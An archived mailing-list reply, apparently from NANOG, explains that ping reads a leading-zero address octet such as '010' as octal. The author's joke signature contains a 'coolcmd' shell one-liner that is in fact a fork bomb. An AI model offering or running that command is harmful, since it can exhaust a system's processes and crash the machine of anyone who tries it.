[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

non operational question related to IP



On Mon, 22 Nov 2010, Greg Whynott wrote:
> osx-gwhynott:~ gwhynott$ ping 10.010.10.1
> PING 10.010.10.1 (10.8.10.1): 56 data bytes

You're entering land of weird, misdocumentation and bugs.

http://seclists.org/nanog/2010/Feb/285

---------
typedef struct me_s {
   char name[]      = { "Thomas Habets" };
   char email[]     = { "thomas at habets.pp.se" };
   char kernel[]    = { "Linux" };
   char *pgpKey[]   = { "http://www.habets.pp.se/pubkey.txt"; };
   char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE  0945 286A E90A AD48 E854" };
   char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;